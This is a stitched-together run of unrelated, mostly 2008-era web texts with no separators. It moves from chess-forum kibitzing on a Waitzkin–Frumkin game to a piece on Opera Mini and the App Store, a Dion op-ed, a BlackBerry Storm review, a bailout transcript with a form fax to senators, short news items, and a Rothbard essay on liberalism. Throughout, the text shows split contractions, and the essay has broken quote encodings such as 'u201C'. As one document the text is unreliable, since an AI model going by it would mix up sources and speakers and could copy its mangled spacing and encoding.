< Earlier Kibitzing · PAGE 5 OF 5 · Later Kibitzing >
Mar -01-09 WhiteRook48 : what are you Frumskin ?
Mar -29-09 Eisenheim : must comment on this exciting ending , since I was overly critical of the other game i was reviewing today .
great sac
Jul -05-09 WhiteRook48 :
Black is some patzer
Aug -21-09 tagbay :
It 's a very nice game and a very creative .
JW could be a world champion and fischer 's heir .. sadly he lost the love of the game
Nov-04-09 Everett :
He did what he wanted .
Nothing wrong with stopping at IM .
Also nothing wrong with not becoming obsessed with the game .
Some of you kibitz like you 're mourning a death .
Dec-14-09 shishio71 :
This is a beautiful sacrifice and mate , but that many moves ahead ??
It almost makes my head spin
Feb-07-10 coldfusion700 : < tagbay :
It 's a very nice game and a very creative .
JW could be a world champion and fischer 's heir .. sadly he lost the love of the game >
He switched to tai chi and other forms of martial arts , which is sad for the chess community since he was so talented and could have been a world champion .
< Everett :
He did what he wanted .
Nothing wrong with stopping at IM .
Also nothing wrong with not becoming obsessed with the game .
Some of you kibitz like you 're mourning a death . >
I agree that there 's nothing wrong since he did what he wanted , but it is still saddening for the chess community for such a chess talent to stop at that level .
It is also saddening just as the case when Morphy left chess abruptly .
Feb-07-10 coldfusion700 : Anyway , Waitzkin might not a GM , but ... he is WORLD CHAMPION OF TAI CHI CHUAN !!
Just beats me for he is such a multi-talented person .
We should still be happy for him even if he left chess .
Oct -04 -10 sevenseaman :
The cause of the embarrassment ?
Frumkin must have had something in mind when he moved .. 22 . Kh8 .
There was no follow up move , he just went to some wasteful activity on Q side .
Was he complacent on a / c of his opponent 's age or just lacked a plan ?
Oct-07 - 10 jmactas : < sevenseaman
The cause of the embarrassment ?
Frumkin must have had something in mind when he moved .. 22 . Kh8 .
There was no follow up move , he just went to some wasteful activity on Q side .
Was he complacent on a / c of his opponent 's age or just lacked a plan ? >
22 . ... Kh8 was done to prevent 23 .
Bf6 leading to forced mate .
He did n't really have a plan , his pieces were kind of walled off from the defense of his king .
Nov-15 - 10 sevenseaman : < jmactas >
Thanks .
What I had in mind was a move like Rg8 and Ba6 at some stage instead of gallivanting around with his N. Capturing a redundant R is not relevant to the immediacy of the defense that was upon him ever since
White went in with the minority attack .
One of the best games I 've come across , nonetheless .
Jun-03-11
wordfunph : Waitzkin- Frumkin
after 25.♖e3
click for larger view giving away the d1 rook and Josh delivered checkmate after 6 moves .
Impressive .
Jun-06 - 11 Llawdogg : Wow !
This guy was great !
And his movie was n't bad either .
Jun-06-11
FSR : This is Josh 's immortal game .
I remember his father Fred Waitzkin writing in his ( stupidly titled ) book about the excitement he and other onlookers felt during the game .
Sep-02-11 LIFE
Master AJ : Pretty game ...
< FSR >
I am sure that you realize that Fred W. prolly did not choose the title of the book ... publisher 's often change manuscripts , especially titles ...
My hunch , but I am nearly certain that I am right here .
( I have read about similar cases . )
Sep-02-11 LIFE
Master AJ : Looked up Josh on the USCF website ... only goes to early 1990's ... would be interested to know PRE - TOURNAMENT USCF ratings of both players ...
Sep-06-11
FSR : It would be interesting to know what was going through Frumkin 's head .
Did he not see the queen sac ?
Even though his opponent was a little kid , it should have been pretty obvious that he was setting up Qxg7 + .
Apr -25 - 12 edcion : at 27 Kh6 would have saved him
Apr-26-12
FSR : < edcion : at 27 Kh6 would have saved him >
27 ... Kh6 would be met by 28 .
Rh3 + Kg6 29 .Rg3 +. Now 29 ... Kh6 30 .Bg7 + transposes to the game , and 29 ... Kh5 is met by 30 .
Rg5 + Kh4 ( 30 ... Kh6 31.Bg7# ) 31.Nf3 # .
Apr-26-12
FSR : It still boggles my mind that Frumkin did n't see what Waitzkin was up to .
25 .Re3 was n't exactly subtle .
If Frumkin had followed Kotov 's recommendation to " Play Like a Patzer " and ask himself what Waitzkin was threatening , he would n't have fallen for 25 ... Nxd1 ??
Aug - 22 - 12 southeuro : Edward Pumpkin is quite a patzer indeed .
Aug -27 - 16 rafaelbdb :
If I 'm not mistaken , Josh said in his ChessMaster XI lessons that this was the first time he has beaten a Master .
May -24 -18 Saniyat24 : Wait , I will turn you into a pumpkin ...!
Nov-08 - 18 newzild :
This was supposedly the first time Waitzkin beat a master , but Frumkin 's career high Elo is only 2150 so this seems to be wrong .
Nov-08 - 18 Granny O Doul : I suspect AJ is right about the " Searching ... " title being the publisher 's idea .
Much of the book 's material first appeared in a New York magazine article titled " The Grungy World of New York Chess " .
That probably would have had less Hollywood potential .
Jump to page # ( enter # from 1 to 5 )
search thread :
In a profile this past week of Opera Software , the New York Times had indicated that Opera 's Mini Browser had been rejected from the App Store based on anti-competitive grounds .
Apple has rejected other applications claiming the submitted application 's feature set mirrors one of Apple 's too closely ; a practice which has drawn heavy criticism .
This particular case , however , may not be entirely accurate according to further research by John Gruber .
My understanding , based on information from informed sources who do not wish to be identified because they were not authorized by their employers , is that Opera has developed an iPhone version of Opera Mini - but they have n't even submitted it to Apple , let alone had it be rejected .
Gruber had previously believed that the browser had been rejected due to a built - in JavaScript interpreter , however he clarifies that this was incorrect .
In fact , Opera Mini does not contain such interpretive code .
As explained by Gruber :
In a nut , it works like this :
You request a URL in Opera Mini .
Opera Mini makes the request to a proxy server run by Opera .
Opera 's proxy server connects to the web server hosting the requested URL , and renders the page into an image .
This image is then transmitted ( in a proprietary format called OBML - Opera Binary Markup Language ) to the Opera Mini client .
Opera Mini displays the rendered image on screen .
This may sound convoluted , but apparently the result is very effective - its faster to transmit , because only OBML ( a compressed binary format ) is transmitted to the mobile device over the phone network , and far faster to render on slow mobile processors .
However the current version of Opera 's Mini browser for other platforms is coded using Java ( and BREW ) which is not supported on the iPhone and is against the terms of the SDK .
In order for Opera Mini to be made officially available , the program would have to be ported to C / Objective -C .
Update : Upon further investigation , the differences between the New York Times and John Gruber 's accountings may be based in semantics rather than substance .
An Opera employee blog seems to indicate that Apple is indeed using anti-competitive reasoning for keeping the Opera Mini browser off the iPhone .
However , neither the employee 's blog entry nor the New York Times article indicate that the browser was officially submitted to the App Store and rejected , the point to which Gruber took issue .
It remains possible that Apple and Opera have been communicating via channels outside of the App Store submission process .
CBC News is citing unnamed sources to suggest that Liberal Leader Stephane Dion will step down on Monday ( October 20 ) .
It raises the question : is Dion too good for the Canadian electorate and the Canadian media ?
Let ’s look at the evidence .
In the 1990s , he stared down Quebec separatists at a tremendous personal cost to his reputation in his home province .
This year , Dion put forward the largest tax - shifting proposal from a major political party in Canadian history — a proposal that would have enhanced our environment and put money into the pockets of responsible citizens .
Some of his opponents on both sides of the ideological spectrum called it a tax grab and a gas tax , when it was n't going to increase revenue and it did n't apply to retail gasoline .
Dion chose not to smear his political opponents personally even when given ample opportunity to do so by many interviewers , including myself .
He pointed out that the Conservative campaign against his Green Shift was based on a lie , but most of the public and the media did n't care .
Dion spoke English with a French accent and for that he was clobbered by the Conservative advertising campaign , which pandered to anti-Quebec attitudes .
Stephen Harper 's party relied on Republican frat - boy tactics to drive down voter turnout and undermine Canadian democracy .
Most of the public and the media did n't care about that , either .
As a result , we ’re stuck with a prime minister who chooses to largely ignore the magnitude of our environmental crises , which will be left in the lap of future generations , including his own children .
Harper ’s accomplice in the destruction of Dion — NDP Leader Jack Layton — has ensured that a Dion - like tax shift wo n’t occur until Canada is subject to trade sanctions by more environmentally responsible countries that are appalled at our conduct .
And within a few months , Canada will likely revert to having a Liberal leader who specializes in realpolitik rather than coming up with solutions to help save the planet .
Canada attracted more than its share of George W. Bush refugees after he was reelected in 2004 .
Perhaps if Barack Obama wins next month 's presidential election , they might decide it 's a good time to return home .
I would n't be surprised if a few Canadians joined the exodus after what we just witnessed in our recent federal election .
We Specialize In All Makes & Models :
The BlackBerry Storm is a lot of things :
It 's the first touchscreen device ever made by RIM , it has a 3.2 - MP camera and it features cut - and - paste tech .
But then there 's an even longer list of what the Storm is not :
The software is n't fully realized , the handset is no lightweight , the battery life is poor .
Most of all , this is n't the iPhone killer RIM was hoping it would be .
How the hell do you brew up an iPhone killer ?
Short of cracking open Steve Jobs ' head and slurping out his big thinky brain , you could create a half - assed imitation that masters one aspect of the Jesus phone and fumbles the snap on virtually every other feature .
That seems to be the model handset manufacturers have been using for almost two years as they churn out a seemingly endless line of touchscreen - enabled iPhone imitators — icones .
There have been Instincts , Dares , Beholds , Diamonds , G1s — even something with the obtuse moniker of Viewty , but none of these come remotely close to knocking the iPhone off its perch as King of All Touchscreens .
And heaven forbid any one of them improve on the flaws ( and there are many ) that the iPhone possesses .
That 's where the Storm is different .
The first device from RIM to carry a full touch - sensitive screen seeks to not only match the iPhone in terms of performance but also kick its ass in areas where Cupertino 's wunderkind falls short .
Yep , that includes video function ( with a superior 3.2 MP camera ) , cut and paste capabilities , and an innovative screen that solves the issue of touchscreen input ambiguity .
The main problem with touch phones is that there is no real way of indicating when you have pressed a key or selected an application .
The haptic buzzing found on various iClones is a joke .
And the iPhone 's complete lack of force feedback is almost as bad .
Remember the first time you picked up an iPhone and started text messaging with it ?
Sucked right ?
You had no clear physical indication when you selected a key .
That 's the crucial difference with the Storm : the 4 - inch , 480x360 screen is essentially one huge button .
When you want to select anything , be it a multimedia app or the number five , you have to press the screen down a millimeter , it 's roughly the same sensation you get when clicking a mouse .
But that small press makes a huge difference .
Text messaging is amazing — pounding out a long - winded SMS ( with a lot of compound words and no abbreviations ) is just as easy as typing one out on a MacBook 's keyboard .
This is the single killer feature of the Storm and if not for a few glaring flaws , a good reason to go out and buy one right now .
Also making an appearance is a very capable 3.2 - MP camera .
While it lacks the fancypants lenses found in better camera phones ( cough , Carl Zeiss , cough ) it does have a flash and snaps off some pretty decent , noiseless pics .
Also included is a video recorder — take that iPhone !
Web surfing on the device is good , not great .
The fully realized browser pulls up pages quickly but also suffers from a lack of flash support .
Cut - and - paste functionality works almost perfectly , as does text editing .
All of RIM 's e-mail goodness and top - shelf messaging are also effortlessly integrated into the device .
For better or for worse , you never forget that you are using a BlackBerry .
But all is not well with the Storm .
When we first looked at the device in October , most of the comments about our preview post had to do with the seemingly inexplicable lack of WiFi .
Come on guys , you should know why this was done .
Verizion ( the only carrier offering the Storm ) wants to line its pockets with cash squeezed from data plans .
Silly goose , they do n't want you patching into a WiFi network for free !
But this is unnecessary and frankly a little myopic — although Verizon 's data network is speedy , it can't beat even a decent WiFi network in a broadband drag race .
Plus other handsets ( including the iPhone ) offer WiFi compatibility .
Battery life skews toward the pathetic .
While not as atrocious as the iPhone 3 G's , it still ran out of juice after a solid day of use .
Granted we were riding the Storm hard — constant web browsing , phone calls and messaging — but you had best not stray far from a charger while on the road .
After spending a lot of quality time with the Storm , it 's apparent that it really is the carrier that cripples this phone .
The hardware that RIM has produced is completely original , wholly impressive and poised to affect the way every phone manufacturer approaches touch technology — including Apple .
But Verizon 's insistence on controlling the operating system is obvious and , well , aggravating .
The phone 's OS has a rushed , shoddy feel .
That , coupled with a tendency to freeze and lag when pulling up applications , is flummoxing .
I get the feeling Verizon pushed RIM to get the Storm launched before its software was completely ready .
Would we recommend the Storm ?
If you 're locked into a contract with Verizon , want a touchscreen phone and are willing to put up with an OS that moves like a tranquilized yak , then yes the Storm is for you .
Otherwise , your best bet is an iPhone or the very capable BlackBerry Bold .
In any case , Apple need not fret ; even in the face of a legitimate iPhone killer , they still offer more touchscreen goodness for the money and will undoubtedly , ahem , weather this storm .
Inquiring minds are considering Bailout Bill : Pros & Cons .
Click Here To Play Video
Following is a partial transcript
Rep. Brad Sherman , D California :
Larry I am glad you have a few seconds to talk to someone who voted against this bill .
I am not changing my mind .
I want to thank my colleagues who stood up to the purveyors of panic and voted against a very bad bill and voted with 400 eminent economists including three Nobel laureates who wrote to us and said do n't panic , do n't act hastily , hold hearings , work carefully .
The fact is Larry if you read this bill , even you would have voted against it .
It provides hundreds of billions of dollars of bailouts to foreign investors .
It provides no real control of Paulson 's power .
There is a critique board but not really a board that can step in and change what he does .
It 's a $ 700 billion program run by a part - time temporary employee and there is no limit on million dollar a month salaries .
Larry Kudlow :
Let me just ask you one question .
I think you are referring to foreign banks headquartered in the United States .
I do not see how foreign investors get bailed out .
Rep. Brad Sherman :
Larry you have to read the bill .
It 's very clear .
The Bank of Shanghai can transfer all of its toxic assets to the Bank of Shanghai of Los Angeles which can then sell them the next day to the Treasury .
I had a provision to say if it was n't owned by an American entity even a subsidiary , but at least an entity in the US , the Treasury can't buy it .
It was rejected .
The bill is very clear .
Assets now held in China and London can be sold to US entities on Monday and then sold to the Treasury on Tuesday .
Paulson has made it clear he will recommend a veto of any bill that contained a clear provision that said if Americans did not own the asset on September 20th that it can't be sold to the Treasury .
Hundreds of billions of dollars are going to bail out foreign investors .
They know it , they demanded it and the bill has been carefully written to make sure that can happen .
Resolution Draft
3 SEC . 112 . COORDINATION WITH FOREIGN AUTHORITIES
4 AND CENTRAL BANKS .
5 The Secretary shall coordinate , as appropriate , with
6 foreign financial authorities and central banks to work to
7 ward the establishment of similar programs by such au
8 thorities and central banks .
To the extent that such for
9 eign financial authorities or banks hold troubled assets as
10 a result of extending financing to financial institutions
11 that have failed or defaulted on such financing , such trou
12 bled assets qualify for purchase under section 101 .
7 SEC . 101 . PURCHASES OF TROUBLED ASSETS .
8 ( a ) OFFICES ; AUTHORITY .—
9 (1 ) AUTHORITY .
— The Secretary is authorized
10 to establish a troubled asset relief program ( or
11 ‘‘ TARP ’’) to purchase , and to make and fund com
12 mitments to purchase , troubled assets from any fi
13 nancial institution , on such terms and conditions as
14 are determined by the Secretary , and in accordance
15 with this Act and the policies and procedures devel
16 oped and published by the Secretary .
SEC .
112 . COORDINATION WITH FOREIGN AUTHORITIES
4 AND CENTRAL BANKS .
5 The Secretary shall coordinate , as appropriate , with
6 foreign financial authorities and central banks to work to
7 ward the establishment of similar programs by such au
8thorities and central banks .
To the extent that such for
9eign financial authorities or banks hold troubled assets as
10 a result of extending financing to financial institutions
11 that have failed or defaulted on such financing , such trou
12bled assets qualify for purchase under section 101 .
Please get this to EVERY senator before the Senate takes a vote .
Suggested Fax Text
Rep. Brad Sherman
On Bailing Out Foreign Investors
Dear senator
Today I listened to Representative Brad Sherman on how the Paulson proposal will purposely bail out foreign investors .
Here is the shocking text as translated from CNBC in an exchange with Larry Kudlow .
Rep. Brad Sherman , D California :
Larry I am glad you have a few seconds to talk to someone who voted against this bill .
I am not changing my mind .
I want to thank my colleagues who stood up to the purveyors of panic and voted against a very bad bill and voted with 400 eminent economists including three Nobel laureates who wrote to us and said do n't panic , do n't act hastily , hold hearings , work carefully .
The fact is Larry if you read this bill , even you would have voted against it .
It provides hundreds of billions of dollars of bailouts to foreign investors .
It provides no real control of Paulson 's power .
There is a critique board but not really a board that can step in and change what he does .
It 's a $ 700 billion program run by a part - time temporary employee and there is no limit on million dollar a month salaries .
Larry Kudlow :
Let me just ask you one question .
I think you are referring to foreign banks headquartered in the United States .
I do not see how foreign investors get bailed out .
Rep. Brad Sherman :
Larry you have to read the bill .
It 's very clear .
The Bank of Shanghai can transfer all of its toxic assets to the Bank of Shanghai of Los Angeles which can then sell them the next day to the Treasury .
I had a provision to say if it was n't owned by an American entity even a subsidiary , but at least an entity in the US , the Treasury can't buy it .
It was rejected .
The bill is very clear .
Assets now held in China and London can be sold to US entities on Monday and then sold to the Treasury on Tuesday .
Paulson has made it clear he will recommend a veto of any bill that contained a clear provision that said if Americans did not own the asset on September 20th that it can't be sold to the Treasury .
Hundreds of billions of dollars are going to bail out foreign investors .
They know it , they demanded it and the bill has been carefully written to make sure that can happen .
Senator , please scrap the Paulson proposal in entirety and try something that might work , that is constitutional , and does not put taxpayer money at risk .
US citizens should not spending $ 700 Billion to bail out foreign investors .
The actions of Treasury Secretary Paulson go far beyond disgusting , to outright betrayal of US citizens .
I ask that you take a clear stand against this un-American bill by not only voting against it , but to Filibuster the bill until it is given up for dead .
I cannot and will not vote for any legislator who votes for this bill , or even allows it to be brought up for vote .
Senator , the United States of America is depending on you to block this bill for the good of the country .
Your Name
Your Phone Number
Your Email Address
Take Action Now
Fax List For All Congress
Stung by US allegations that elements in its spy agency colluded with Islamic militants in the July bombing of the Indian embassy in Afghanistan , Pakistan has conceded that there were " probably " Taliban sympathisers within the ranks of its powerful intelligence establishment .
The Pakistani government , which indignantly denied the reports of involvement in the bombing as soon as they surfaced , reiterated that there was no evidence that members of its Directorate for Inter - Services Intelligence ( ISI ) had aided Taliban militants in the attack in the Afghan capital , Kabul , which left about 60 people dead .
But now senior Pakistani officials are offering a more nuanced response to US intelligence officials ' allegations of ISI complicity in the July 7 bombing , which were first reported by The New York Times .
" There is no proof of ISI involvement " in the attack in Kabul , said Information Minister Sherry Rehman , who is close to Prime Minister Yousuf Raza Gilani .
But she added : " There are probably still individuals within the ISI who are ideologically sympathetic to the Taliban and act on their own in ways that are not in convergence with the policies and interests of the government of Pakistan .
We need to identify these people and weed them out . "
Earlier , Pakistan 's military spokesman , Major General Athar Abbas , called the report " unfounded , baseless and malicious " .
McCain Completely Misrepresents U.S. - Iraq Basing Deal
Created : October 22 , 2008 18:10 | Last updated : July 31 , 2020 00:00
My colleague Matt DeLong caught Sen. John McCain ’s interview with CNN ’s Wolf Blitzer and passed along a quick discussion about the U.S. - Iraq basing deal that calls for a total withdrawal of all U.S. forces by Dec. 31 , 2011 .
Long story short : Either McCain has n’t read the latest text or he ’s just making stuff up .
( Transcript courtesy of the Mighty DeLong and his Amazing TiVo Device . )
Blitzer :
The Bush administration seems to be close to what is called a “ status of forces ” agreement with the Iraqi government of Prime Minister Nouri al - Maliki .
It calls , in the draft agreement at least , for the complete withdrawal of combat forces from villages and cities by July 30 of 2009 , and out of the country by December 30 , 2011 .
If you ’re elected president , would you , as commander - in - chief , honor this agreement if , in fact , it ’s formalized ?
McCain : With respect Wolf , and you know better , my friend .
You know better .
It ’s condition - based .
It ’s conditions - based , and Ryan Crocker , our ambassador to Baghdad , said , “ If you want to know what victory looks like , look at this agreement . ”
You know better than that , Wolf .
You know it ’s condition - based , and that ’s what the big fight was all about .
Actually , my friends , it ’s McCain who should know better .
I ’ll have much more on this in a piece tomorrow morning , but if you read Article 25 of the Oct. 13 text — as I blogged yesterday — you ’ll see it says that “ The U.S. forces shall withdraw from Iraqi territories no later than December 31st , 2011 ″ and goes on to say “ U.S. combat forces will withdraw from all cities , towns , and villages as soon as the Iraqi forces take over the full security responsibilities in them .
The U.S. withdrawal from these areas shall take place no later than June 30th , 2009 . ”
The only possible claim to truth McCain has here is in subsection 4 , which allows for a “ review ” for “ one side asking the other to extend or reduce the time periods mentioned . ”
But changing the dates requires “ both sides ’ approval , ” which is going to be difficult to obtain and easy for one side to obstruct .
What the agreement definitely does not call for is “ conditions ” to determine the pace of withdrawal .
Sorry , my friend , but your position on the war is in tatters .
Seventy - two percent of the Israeli public rated the general level of corruption in the Israeli government as " high to very high , " a corruption index poll taken ahead of the Israel - Sderot Conference on Social Issues revealed .
The poll , published on Tuesday , showed that only 1 % of the public rated the corruption level as " low to very low , " compared to 9 % in 2007 .
Elections Poll : 84 % of Israelis will vote in next general election Ynet War and Peace Index says vast majority of Israelis intend on exercising right to vote come February 10 ; most say will base vote on party 's ideology , stand on security Poll : 84 % of Israelis will vote in next general election
The political parties were perceived as more corrupt than in the past two years - a 10 % rise to 69 % this year , compared to 59 % in 2007 and 58 % in 2006 was recorded .
Government offices came in second place , with 46 % of the public finding them corrupt compared to 44 % in 2007 and 2006 .
The Knesset is the third most corrupt body according to the poll , getting 44 % of the public 's votes this year and in 2007 compared to 46 % in 2006 .
Other bodies viewed as " corrupt to very corrupt " include local authorities ( 37 % ) , manpower companies ( 33 % ) media outlets ( 30 % ) , the police ( 29 % ) and the Histadrut labor union federation ( 27 % ) .
Meanwhile , the Israel Defense Force and the defense establishment are viewed as well functioning bodies , with only 11 % of the public rating them as " corrupt to very corrupt , " compared to 12 % last year .
The corruption rating of banks ( 20 % ) has dropped significantly compared to previous polls , ( 29 % in 2007 and 30 % in 2006 ) and the rate of percieved corruption in the healthcare system has also dropped to 12 % from 19 % last year and 15 % in 2006 .
The poll was carried out by the Maagar Mochot research institute in Novemeber 2008 and is based on the indexes carried out in October 2007 and October 2006 with only slight differences in the composition of the questionnaires .
The 2008 poll was based on 543 telephone interviews of a representative sample of the adult population in Israel .
The interviews were carried out in Hebrew , Russian and Arabic .
Greg Kroah - Hartman is a longtime developer of the Linux kernel , known for his work maintaining USB drivers .
O’Reilly Media recently interviewed Greg about his claim that the Linux kernel now supports more devices than any other operating system ever has , as well as why binary - only drivers are illegal , and how the kernel development process works .
“ I went and asked every single hardware manufacturer , the big guys that ship the boxes , Dell , IBM , HP – what do you ship that is n’t supported by Linux ?
They came back with nothing .
Everything is supported by Linux .
If you have a device that is n’t supported by Linux that ’s being shipped today , let me know . ” .
If you would like to take up Greg KH on his claim , his email address is greg AT kroah.com
SAN FRANCISCO ( MarketWatch ) -- The Securities and Exchange Commission on Monday charged Dallas Mavericks owner and Internet entrepreneur Mark Cuban with insider trading .
The SEC alleges Cuban in June 2004 sold 600,000 shares of Internet search engine company Mamma.com Inc. on inside information that the company would initiate a stock offering .
The charges allege Cuban knew that the offering would be at a discount and it would be dilutive to existing shareholders .
Charles Calomiris is angry .
Hank Paulson 's plan to save the economy ?
" Truly idiotic , " says Calomiris , who is the Henry Kaufman Professor of Financial Institutions at Columbia University 's business school .
" This whole thing has been complete nonsense .
We did it in the 1930s ten times better than this .
This is n't complicated . "
Deal Journal caught up with Calomiris late Monday to talk over the state of the financial world .
Calomiris has long advised governments , banks , and private investors on financial crises .
And while he spoke ...
Originally published in Left and Right , Spring 1965 , this essay is collected in Egalitarianism as a Revolt Against Nature and Other Essays , 2nd Edition .
The Conservative has long been marked , whether he knows it or not , by long - run pessimism : by the belief that the long - run trend , and therefore time itself , is against him .
Hence , the inevitable trend runs toward left - wing statism at home and communism abroad .
It is this long - run despair that accounts for the Conservative 's rather bizarre short - run optimism , for since the long run is given up as hopeless , the Conservative feels that his only hope of success rests in the current moment .
In foreign affairs , this point of view leads the Conservative to call for desperate showdowns with communism , for he feels that the longer he waits the worse things will ineluctably become ; at home , it leads him to total concentration on the very next election , where he is always hoping for victory and never achieving it .
The quintessence of the practical man , and beset by long - run despair , the Conservative refuses to think or plan beyond the election of the day .
Pessimism , however , both short - run and long - run , is precisely what the prognosis of conservatism deserves , for conservatism is a dying remnant of the ancien rgime of the preindustrial era , and , as such , it has no future .
In its contemporary American form , the recent Conservative revival embodied the death throes of an ineluctably moribund , fundamentalist , rural , small - town , white Anglo - Saxon America .
What , however , of the prospects for liberty ?
For too many libertarians mistakenly link the prognosis for liberty with that of the seemingly stronger and supposedly allied Conservative movement ; this linkage makes the characteristic long - run pessimism of the modern Libertarian easy to understand .
But this chapter contends that , while the short - run prospects for liberty at home and abroad may seem dim , the proper attitude for the Libertarian to take is that of unquenchable long - run optimism .
The case for this assertion rests on a certain view of history which holds , first , that before the eighteenth century in Western Europe there existed ( and still continues to exist outside the West ) an identifiable Old Order .
Whether the Old Order took the form of feudalism or Oriental despotism , it was marked by tyranny , exploitation , stagnation , fixed caste , and hopelessness and starvation for the bulk of the population .
In sum , life was u201 Cnasty , brutish , and shortu201D ; here was Maine 's u201 Csociety of statusu201D and Spencer 's u201 Cmilitary society.u201D
The ruling classes , or castes , governed by conquest and by getting the masses to believe in the alleged divine imprimatur to their rule .
Egalitarianism as a Re ... Murray N. Rothbard Best Price : $ 3.44 Buy New $ 8.95 ( as of 07:55 EST - Details )
The Old Order was , and still remains , the great and mighty enemy of liberty ; and it was particularly mighty in the past because there was then no inevitability about its overthrow .
When we consider that basically the Old Order had existed since the dawn of history , in all civilizations , we can appreciate even more the glory and the magnitude of the triumph of the liberal revolution of and around the eighteenth century .
Part of the dimensions of this struggle has been obscured by a great myth of the history of Western Europe implanted by antiliberal German historians of the late nineteenth century .
The myth held that the growth of absolute monarchies and of mercantilism in the early modern era was necessary for the development of capitalism , since these served to liberate the merchants and the people from local feudal restrictions .
In actuality , this was not at all the case ; the king and his nation - State served rather as a super - feudal overlord reimposing and reinforcing feudalism just as it was being dissolved by the peaceful growth of the market economy .
The king superimposed his own restrictions and monopoly privileges onto those of the feudal regime .
The absolute monarchs were the Old Order writ large and made even more despotic than before .
Capitalism , indeed , flourished earliest and most actively precisely in those areas where the central State was weak or nonexistent : the Italian cities , the Hanseatic League , the confederation of seventeenth - century Holland .
Finally , the Old Order was overthrown or severely shaken in its grip in two ways .
One was by industry and the market expanding through the interstices of the feudal order ( for example , industry in England developing in the countryside beyond the grip of feudal , State and guild restrictions ) .
More important was a series of cataclysmic revolutions that blasted loose the Old Order and the old ruling classes : the English Revolutions of the seventeenth century , the American Revolution , and the French Revolution , all of which were necessary for the ushering in of the Industrial Revolution and of at least partial victories for individual liberty , laissez - faire , separation of church and state , and international peace .
The society of status gave way , at least partially , to the u201 Csociety of contractu201D ; the military society gave way partially to the u201 Cindustrial society .
u201D
The mass of the population now achieved a mobility of labor and place , and accelerating expansion of their living standards , for which they had scarcely dared to hope .
Liberalism had indeed brought to the Western world not only liberty , the prospect of peace , and the rising living standards of an industrial society , but above all , perhaps , it brought hope , a hope in ever - greater progress that lifted the mass of mankind out of its age - old sinkhole of stagnation and despair .
For a New Liberty : The ... Rothbard , Murray N. Best Price : $ 20.50 Buy New $ 66.60 ( as of 07:15 EST - Details )
Soon there developed in Western Europe two great political ideologies , centered around this new revolutionary phenomenon : one was liberalism , the party of hope , of radicalism , of liberty , of the Industrial Revolution , of progress , of humanity ; the other was conservatism , the party of reaction , the party that longed to restore the hierarchy , statism , theocracy , serfdom , and class exploitation of the Old Order .
Since liberalism admittedly had reason on its side , the Conservatives darkened the ideological atmosphere with obscurantist calls for romanticism , tradition , theocracy , and irrationalism .
Political ideologies were polarized , with liberalism on the extreme u201 Cleft , u201D and conservatism on the extreme u201 Cright , u201D of the ideological spectrum .
That genuine liberalism was essentially radical and revolutionary was brilliantly perceived , in the twilight of its impact , by the great Lord Acton ( one of the few figures in the history of thought who , charmingly , grew more radical as he grew older ) .
Acton wrote that u201CLiberalism wishes for what ought to be , irrespective of what is .
u201D
In working out this view , incidentally , it was Acton , not Trotsky , who first arrived at the concept of the u201 Cpermanent revolution .
u201D
As Gertrude Himmelfarb wrote in her excellent study of Acton :
. . . his philosophy develop ( ed ) to the point where the future was seen as the avowed enemy of the past , and where the past was allowed no authority except as it happened to conform to morality .
To take seriously this Liberal theory of history , to give precedence to u201 C what ought to beu201D over u201 C what is , u201D was , he admitted , virtually to install a u201 Crevolution in permanence .
u201D
The u201 Crevolution in permanence , u201D as Acton hinted in the inaugural lecture and admitted frankly in his notes , was the culmination of his philosophy of history and theory of politics .
. . .
This idea of conscience , that men carry about with them the knowledge of good and evil , is the very root of revolution , for it destroys the sanctity of the past .
. . .
u201 CLiberalism is essentially revolutionary , u201D Acton observed .
u201 CFacts must yield to ideas .
Peaceably and patiently if possible .
Violently if not.u201D [ 1 ]
The Liberal , wrote Acton , far surpassed the Whig :
The Whig governed by compromise .
The Liberal begins the reign of ideas .
. . .
One is practical , gradual , ready for compromise .
The other works out a principle philosophically .
One is a policy aiming at a philosophy .
The other is a philosophy seeking a policy . [ 2 ]
What happened to liberalism ?
Why then did it decline during the nineteenth century ?
This question has been pondered many times , but perhaps the basic reason was an inner rot within the vitals of liberalism itself .
For , with the partial success of the Liberal Revolution in the West , the Liberals increasingly abandoned their radical fervor and , therefore , their liberal goals , to rest content with a mere defense of the uninspiring and defective status quo .
Two philosophical roots of this decay may be discerned .
First is the abandonment of natural rights and u201 Chigher lawu201D theory for utilitarianism , for only forms of natural or higher law theory can provide a radical base outside the existing system from which to challenge the status quo ; and only such theory furnishes a sense of necessary immediacy to the libertarian struggle by focusing on the necessity of bringing existing criminal rulers to the bar of justice .
Utilitarians , on the other hand , in abandoning justice for expediency , also abandon immediacy for quiet stagnation and inevitably end up as objective apologists for the existing order .
The Ethics of Liberty Rothbard , Murray N. Best Price : $ 9.63 Buy New $ 19.00 ( as of 02:25 EST - Details )
The second great philosophical influence on the decline of liberalism was evolutionism , or Social Darwinism , which put the finishing touches to liberalism as a radical force in society .
For the Social Darwinist erroneously saw history and society through the peaceful , rose - colored glasses of infinitely slow , infinitely gradual social evolution .
Ignoring the prime fact that no ruling caste in history has ever voluntarily surrendered its power , and that , therefore , liberalism had to break through by means of a series of revolutions , the Social Darwinists looked forward peacefully and cheerfully to thousands of years of infinitely gradual evolution to the next supposedly inevitable stage of individualism .
An interesting illustration of a thinker who embodies within himself the decline of liberalism in the nineteenth century is Herbert Spencer .
Spencer began as a magnificently radical liberal , indeed virtually a pure libertarian .
But , as the virus of sociology and Social Darwinism took over in his soul , Spencer abandoned libertarianism as a dynamic historical movement , although at first without abandoning it in pure theory .
In short , while looking forward to an eventual ideal of pure liberty , Spencer began to see its victory as inevitable , but only after millennia of gradual evolution , and thus , in actual fact , Spencer abandoned liberalism as a fighting , radical creed and confined his liberalism in practice to a weary , rear - guard action against the growing collectivism of the late nineteenth century .
Interestingly enough , Spencer 's tired shift u201 Crightwardu201D in strategy soon became a shift rightward in theory as well , so that Spencer abandoned pure liberty even in theory , for example , in repudiating his famous chapter in Social Statics , u201CThe Right to Ignore the State.u201D
In England , the classical liberals began their shift from radicalism to quasi - conservatism in the early nineteenth century ; a touchstone of this shift was the general British liberal attitude toward the national liberation struggle in Ireland .
This struggle was twofold : against British political imperialism and against feudal landlordism which had been imposed by that imperialism .
By their Tory blindness toward the Irish drive for national independence , and especially for peasant property against feudal oppression , the British Liberals ( including Spencer ) symbolized their effective abandonment of genuine liberalism , which had been virtually born in a struggle against the feudal land system .
Only in the United States , the great home of radical liberalism ( where feudalism had never been able to take root outside the South ) , did natural rights and higher - law theory , and consequent radical liberal movements , continue in prominence until the mid-nineteenth century .
In their different ways , the Jacksonian and Abolitionist movements were the last powerful radical libertarian movements in American life . [ 3 ]
